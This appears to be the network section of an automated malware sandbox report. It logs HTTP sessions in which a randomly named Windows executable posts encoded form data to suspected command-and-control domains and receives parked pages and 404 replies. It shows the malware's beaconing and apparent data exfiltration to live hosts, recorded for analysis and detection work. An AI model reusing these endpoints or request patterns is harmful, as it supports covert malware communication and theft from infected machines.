                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 43 61 46 31 51 45 46 58 75 30 5a 35 79 38 62 47 57 45 45 4a 72 4c 32 2b 56 50 78 47 65 32 39 76 6b 64 6f 63 49 49 6a 47 42 7a 7a 71 58 2b 71 72 30 31 6c 7a 31 6e 50 79 43 59 46 4c 53 48 51 70 53 4c 36 74 6a 32 37 33 36 34 43 47 6f 56 6f 57 32 55 6a 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCaF1QEFXu0Z5y8bGWEEJrL2+VPxGe29vkdocIIjGBzzqX+qr01lz1nPyCYFLSHQpSL6tj27364CGoVoW2UjAw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Dec 24, 2024 11:36:37.923439026 CET595INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDA1MzQ2ZTQtMDlhMS00MDE5LTk1NTAtNjlkOTljM2Q4MDI3IiwicGFnZV90aW1lIjoxNzM1MDM2NT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.449812199.59.243.227801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:39.505783081 CET10808OUTPOST /vupi/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.hokasportshoes.shop
                                                                                                                    Origin: http://www.hokasportshoes.shop
                                                                                                                    Referer: http://www.hokasportshoes.shop/vupi/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 65 6f 51 66 4e 52 39 7a 4d 44 37 63 30 4e 37 39 62 6d 31 47 51 4c 76 56 32 64 48 52 34 78 30 31 7a 6e 6c 6f 44 38 2b 51 53 6d 79 56 35 75 7a 73 68 64 33 49 53 70 37 51 52 61 4c 6e 57 43 63 6b 43 4f 6d 41 73 64 64 30 6f 64 76 62 46 51 44 6e 6d 47 75 79 38 4f 4d 30 6f 54 6c 34 77 37 73 79 39 56 50 64 6f 2f 77 57 55 50 75 61 30 46 5a 48 41 6d 38 64 79 6d 6a 6a 6a 32 71 41 65 32 2b 39 73 32 61 43 50 6a 45 32 78 6a 43 2f 4b 32 65 2f 4f 43 4c 30 30 68 59 55 67 4f 76 76 6e 72 53 66 56 49 43 44 6e 7a 49 73 5a 34 49 52 6e 61 4f 5a 54 65 35 34 2b 62 34 66 61 65 6a 72 38 66 59 61 2f 42 2f 68 65 68 56 33 5a 38 50 30 6a 76 57 68 36 4b 50 69 69 6e 50 64 79 4e 53 70 30 71 47 66 47 45 76 47 64 75 64 55 63 4f 6a 69 4c 41 41 35 45 46 57 55 6d 45 31 74 67 61 37 2f 42 54 34 6b 32 7a 6d 64 2b 74 7a 4a 62 33 31 41 36 63 4e 48 56 44 6e 47 74 2f 32 5a 79 76 4d 43 73 6c 6a 51 42 67 6d 64 61 67 6c 55 67 56 49 37 47 33 4b 6a 46 48 4d 75 35 43 41 75 77 6b 78 6b 4d 74 65 35 2f 30 31 57 71 53 76 45 53 6e [TRUNCATED]
                                                                                                                    Data Ascii: APatc2S=eoQfNR9zMD7c0N79bm1GQLvV2dHR4x01znloD8+QSmyV5uzshd3ISp7QRaLnWCckCOmAsdd0odvbFQDnmGuy8OM0oTl4w7sy9VPdo/wWUPua0FZHAm8dymjjj2qAe2+9s2aCPjE2xjC/K2e/OCL00hYUgOvvnrSfVICDnzIsZ4IRnaOZTe54+b4faejr8fYa/B/hehV3Z8P0jvWh6KPiinPdyNSp0qGfGEvGdudUcOjiLAA5EFWUmE1tga7/BT4k2zmd+tzJb31A6cNHVDnGt/2ZyvMCsljQBgmdaglUgVI7G3KjFHMu5CAuwkxkMte5/01WqSvESnhNks5/RtPmDriiI84KWw01Lc/CmhyKW347DL2KY6hn4F61Bir9kd0/yizyYWNj9f9FdvvD5ZQPFrPL3wo3bL7u2bD2nsLB2i8s56bmP0EgafC8nFtFftRNVNkB4ZdXktaxJvUMSatqQlcKWpp7ouev8cNicvOoqRmbgVAllMv1+1iynM1arZqpplOyUT3ER1faOznPAigANxvOSYr6y8MbdCaDE6hG05USWpy3Cx89eRKxZd6yuf5y3yoV0yRE5QRYwndZ34eI137hlNMSWsmNWcupeUHZT4eoUgzW10kwCTDOMdYIYpkUY1QrM/LLpKcwLvlHU1sEciMKPQ57izbWA7HdXB1S+4RpjJ0X7UEECYkY4+41aJnoXt18g9Bjx/knwZBqa0FgSSZtt20Ck/Ve8sUjnzigc6Y12aDV3tP1DlEh8ewVxDlLzdJMTkFYk1jWmi6doxQLhXwNyckYLsKi3FwWieqXqh8g71wTUqrF7PissQ2A5m/SCTBsxm2cpg51naFLjK7R66QZyFJtzhno/rqVl+lBhA1Tbtg2VWnMrG1RL/KH8V7QLejQB2pZk6IuqBXMoSz2tMGqy0EGBvkN5kVawuT70c1I2H0zJKnsAibUwQh96kqtpQFm4oW8j7rmQs1V3PfNGF/1mzrkxzvNfgbUsHYXwLKz [TRUNCATED]
                                                                                                                    Dec 24, 2024 11:36:40.604724884 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:36:39 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1142
                                                                                                                    x-request-id: a64ab159-6607-4e30-be2c-60740607edd7
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCaF1QEFXu0Z5y8bGWEEJrL2+VPxGe29vkdocIIjGBzzqX+qr01lz1nPyCYFLSHQpSL6tj27364CGoVoW2UjAw==
                                                                                                                    set-cookie: parking_session=a64ab159-6607-4e30-be2c-60740607edd7; expires=Tue, 24 Dec 2024 10:51:40 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 43 61 46 31 51 45 46 58 75 30 5a 35 79 38 62 47 57 45 45 4a 72 4c 32 2b 56 50 78 47 65 32 39 76 6b 64 6f 63 49 49 6a 47 42 7a 7a 71 58 2b 71 72 30 31 6c 7a 31 6e 50 79 43 59 46 4c 53 48 51 70 53 4c 36 74 6a 32 37 33 36 34 43 47 6f 56 6f 57 32 55 6a 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCaF1QEFXu0Z5y8bGWEEJrL2+VPxGe29vkdocIIjGBzzqX+qr01lz1nPyCYFLSHQpSL6tj27364CGoVoW2UjAw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Dec 24, 2024 11:36:40.604790926 CET595INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTY0YWIxNTktNjYwNy00ZTMwLWJlMmMtNjA3NDA2MDdlZGQ3IiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.449820199.59.243.227801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:42.157037973 CET428OUTGET /vupi/?APatc2S=Tq4/OmBpIxnnwNjJag9TFYyv8dvb/Sss2ypRVdq0cF+rzvKYwtC+P6jcfpXxbnkAS7eQgKkM8sOtTzDV8Gz3yNosqQRn5vos9Tvg5+UIPuaa+2ZkNRQX8Ww=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.hokasportshoes.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Dec 24, 2024 11:36:43.245138884 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:36:42 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1486
                                                                                                                    x-request-id: 298065e6-8873-4ff4-9bee-24463136be8f
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VPotO9wlW9rXBKmNqwrr1ld0ipI2DMeEIYrVFav75wqfhA4ST7j3TaytRVZaA/dSYa3CCvFRgB/U6wIlioL2nQ==
                                                                                                                    set-cookie: parking_session=298065e6-8873-4ff4-9bee-24463136be8f; expires=Tue, 24 Dec 2024 10:51:43 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 50 6f 74 4f 39 77 6c 57 39 72 58 42 4b 6d 4e 71 77 72 72 31 6c 64 30 69 70 49 32 44 4d 65 45 49 59 72 56 46 61 76 37 35 77 71 66 68 41 34 53 54 37 6a 33 54 61 79 74 52 56 5a 61 41 2f 64 53 59 61 33 43 43 76 46 52 67 42 2f 55 36 77 49 6c 69 6f 4c 32 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VPotO9wlW9rXBKmNqwrr1ld0ipI2DMeEIYrVFav75wqfhA4ST7j3TaytRVZaA/dSYa3CCvFRgB/U6wIlioL2nQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Dec 24, 2024 11:36:43.245212078 CET939INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjk4MDY1ZTYtODg3My00ZmY0LTliZWUtMjQ0NjMxMzZiZThmIiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.449836162.0.236.169801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:48.820530891 CET694OUTPOST /8t9s/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.primetream.live
                                                                                                                    Origin: http://www.primetream.live
                                                                                                                    Referer: http://www.primetream.live/8t9s/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 52 53 6d 79 52 32 6b 45 64 62 62 48 6e 54 42 52 53 32 4b 5a 35 4a 31 47 63 37 57 64 4e 4f 5a 75 74 57 76 42 4d 53 73 37 5a 74 43 50 33 6b 5a 41 35 73 55 48 6e 71 36 62 77 42 74 32 57 46 6f 2f 78 47 2f 33 62 62 4e 54 45 6a 37 55 2f 6c 53 49 62 2f 37 6d 62 77 5a 49 54 55 6a 45 65 55 4b 4c 59 42 72 46 74 4c 4c 63 62 5a 6d 6a 78 38 4c 38 4e 5a 36 56 57 61 47 55 5a 31 50 58 42 63 76 31 46 41 69 43 48 31 38 6f 68 46 6e 4c 75 61 61 36 78 33 2f 49 6d 59 4c 47 6f 56 62 6a 30 78 67 48 46 70 31 59 59 48 56 74 47 5a 6e 6c 4f 54 59 32 47 66 46 4b 68 66 54 5a 51 51 52 76 69 54 45 50 74 67 3d 3d
                                                                                                                    Data Ascii: APatc2S=RSmyR2kEdbbHnTBRS2KZ5J1Gc7WdNOZutWvBMSs7ZtCP3kZA5sUHnq6bwBt2WFo/xG/3bbNTEj7U/lSIb/7mbwZITUjEeUKLYBrFtLLcbZmjx8L8NZ6VWaGUZ1PXBcv1FAiCH18ohFnLuaa6x3/ImYLGoVbj0xgHFp1YYHVtGZnlOTY2GfFKhfTZQQRviTEPtg==
                                                                                                                    Dec 24, 2024 11:36:50.059297085 CET533INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 24 Dec 2024 10:36:49 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.449842162.0.236.169801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:51.489953041 CET714OUTPOST /8t9s/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.primetream.live
                                                                                                                    Origin: http://www.primetream.live
                                                                                                                    Referer: http://www.primetream.live/8t9s/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 52 53 6d 79 52 32 6b 45 64 62 62 48 6c 7a 78 52 64 32 32 5a 2f 70 31 46 51 62 57 64 47 75 5a 71 74 57 7a 42 4d 54 70 6a 61 65 32 50 77 46 70 41 34 74 55 48 67 71 36 62 6c 78 74 7a 4a 56 70 78 78 47 43 4b 62 65 6c 54 45 6a 76 55 2f 6e 36 49 62 4d 44 70 62 67 5a 4b 62 30 6a 47 52 30 4b 4c 59 42 72 46 74 4c 4f 35 62 5a 2b 6a 78 74 37 38 4e 34 36 61 62 36 47 58 65 31 50 58 46 63 76 78 46 41 6a 6e 48 30 68 4e 68 48 76 4c 75 61 71 36 77 6c 58 4c 6f 6f 4c 45 73 56 61 56 6e 79 56 50 44 4b 38 35 61 47 74 38 4e 63 44 70 47 31 56 73 58 75 6b 64 7a 66 33 71 4e 58 59 62 76 51 35 47 32 6c 36 51 6c 6b 33 54 75 70 33 6f 44 49 58 2b 31 4c 79 30 63 4d 67 3d
                                                                                                                    Data Ascii: APatc2S=RSmyR2kEdbbHlzxRd22Z/p1FQbWdGuZqtWzBMTpjae2PwFpA4tUHgq6blxtzJVpxxGCKbelTEjvU/n6IbMDpbgZKb0jGR0KLYBrFtLO5bZ+jxt78N46ab6GXe1PXFcvxFAjnH0hNhHvLuaq6wlXLooLEsVaVnyVPDK85aGt8NcDpG1VsXukdzf3qNXYbvQ5G2l6Qlk3Tup3oDIX+1Ly0cMg=
                                                                                                                    Dec 24, 2024 11:36:52.706269979 CET533INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 24 Dec 2024 10:36:52 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.449850162.0.236.169801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:54.147028923 CET10796OUTPOST /8t9s/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.primetream.live
                                                                                                                    Origin: http://www.primetream.live
                                                                                                                    Referer: http://www.primetream.live/8t9s/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 52 53 6d 79 52 32 6b 45 64 62 62 48 6c 7a 78 52 64 32 32 5a 2f 70 31 46 51 62 57 64 47 75 5a 71 74 57 7a 42 4d 54 70 6a 61 66 4f 50 77 32 78 41 35 4f 4d 48 68 71 36 62 35 68 74 79 4a 56 6f 74 78 47 71 4f 62 65 6f 75 45 6c 72 55 2b 47 61 49 5a 39 44 70 55 67 5a 4b 58 55 6a 46 65 55 4c 54 59 42 37 42 74 4c 65 35 62 5a 2b 6a 78 75 54 38 45 4a 36 61 5a 36 47 55 5a 31 50 6c 42 63 76 5a 46 45 47 61 48 30 6b 34 39 6a 6a 4c 70 36 36 36 39 32 2f 4c 75 34 4c 43 72 56 61 64 6e 79 4a 41 44 4a 49 54 61 47 4a 57 4e 61 2f 70 43 44 67 6c 49 65 59 5a 6c 2b 58 56 52 6d 5a 2b 75 6a 6c 34 76 6d 36 6e 30 45 44 47 39 71 50 74 44 66 71 74 79 6f 2b 6f 64 59 48 68 30 78 78 37 59 45 77 64 70 39 36 66 38 66 31 66 44 39 45 6d 70 6f 50 55 55 6f 33 6b 67 58 4e 30 32 45 52 75 45 59 6a 55 78 51 4d 50 48 31 69 61 55 6e 62 68 66 54 66 49 6d 57 7a 31 54 44 32 54 52 33 62 69 69 74 4f 33 6c 58 48 36 4c 32 4c 66 54 68 37 59 39 36 50 66 73 44 62 4f 6d 69 36 39 37 54 67 43 38 65 34 30 70 4f 41 31 35 77 75 6a 66 72 [TRUNCATED]
